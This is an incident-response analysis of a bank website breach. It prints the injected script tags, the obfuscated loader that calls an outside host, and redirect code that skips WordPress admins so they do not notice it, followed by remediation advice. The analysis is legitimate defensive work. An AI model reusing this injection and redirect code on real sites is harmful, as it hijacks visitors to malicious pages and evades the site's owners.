# Prasac website breach investigation
## Analysis
The following link redirects to an uncontrolled website
https://www.prasac.com.kh/en/news-and-event/prasac-becomes-new-member-of-bakong-system
Inspection shows that it contains the following unwanted javascript:
```javascript
<script src='https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043' type='text/javascript'></script><script src='https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043' type='text/javascript'></script><script src='https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043' type='text/javascript'></script><script src='https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043' type='text/javascript'></script>
```
This malicious javascript fetches resource
http://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=04
contents:
```javascript
var elem = document.createElement('script');
elem.type = 'text/javascript';
elem.async = true;
elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,119,105,116,104,98,101,115,116,119,105,115,104,101,115,106,97,110,110,121,46,99,111,109,47,102,111,108,108,111,119);
var alls = document.getElementsByTagName('script');
var nt3 = true;
for ( var i = alls.length; i--;) {
if (alls[i].src.indexOf("/follow") > -1) {
nt3 = false;
}
}
if(nt3 == true){
document.getElementsByTagName("head")[0].appendChild(elem);
}
```
After deobfuscating the string `elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,119,105,116,104,98,101,115,116,119,105,115,104,101,115,106,97,110,110,121,46,99,111,109,47,102,111,108,108,111,119);` we get `https://withbestwishesjanny.com/follow`
The contents of the https://withbestwishesjanny.com/follow (with spaces):
```javascript
var pp = finwgtt();
if(pp == 0) {
window.stop();location.replace('https://red.toupandgoforward.com/f.php?h=zsmfnahbwv3rqcwa3RX&yJ=51&s1=56831&s2=news&s3=73212');
}
function finwgtt() { var sdmfsjhg = document.cookie.indexOf('wp-settings-time') !== -1; if (window.location.href.indexOf("wp-login.php") > -1) { return 1; }if(sdmfsjhg){ return 1; }else{return 0; } return 0;}
```
We have to mention that the resource responds with different content. In the response below there is another javascript:
```javascript
var pp = finwgtt();
if(pp == 0) {
window.stop();location.replace('https://ticker.trasnaltemyrecords.com/cron.php?utm_camp=5&utm_click=4363&campid=235&red_id=6845&append=987432&u_click=56547&cpid=3472&rid=347342');
}
function finwgtt() { var sdmfsjhg = document.cookie.indexOf('wp-settings-time') !== -1; if (window.location.href.indexOf("wp-login.php") > -1) { return 1; }if(sdmfsjhg){ return 1; }else{return 0; } return 0;}
```
## Recommendations
1. Delete the malicious javascript from every page:
```javascript
<script src='https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043' type='text/javascript'></script><script src='https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043' type='text/javascript'></script><script src='https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043' type='text/javascript'></script><script src='https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043' type='text/javascript'></script>
```
It is better to restore the website from backups entirely, but beware of downtime and loss of changes since last backup.
2. We suppose the affected resource uses Wordpress. Wordpress and its plugins should be updated.
3. Contact the police to find the owners of `scripts.trasnaltemyrecords.com` and `withbestwishesjanny.com` domains.
4. Perform a website security audit. There is not enough information to determine how the affected resource has been breached, it could be attack on wordpress, stored XSS or even internal intrusion (less likely).
5. Compare the current state of the website with backups to find out if there are any other unauthorized changes. This measure might help to investigate more deeply.
Sign in with Wallet
Connect another wallet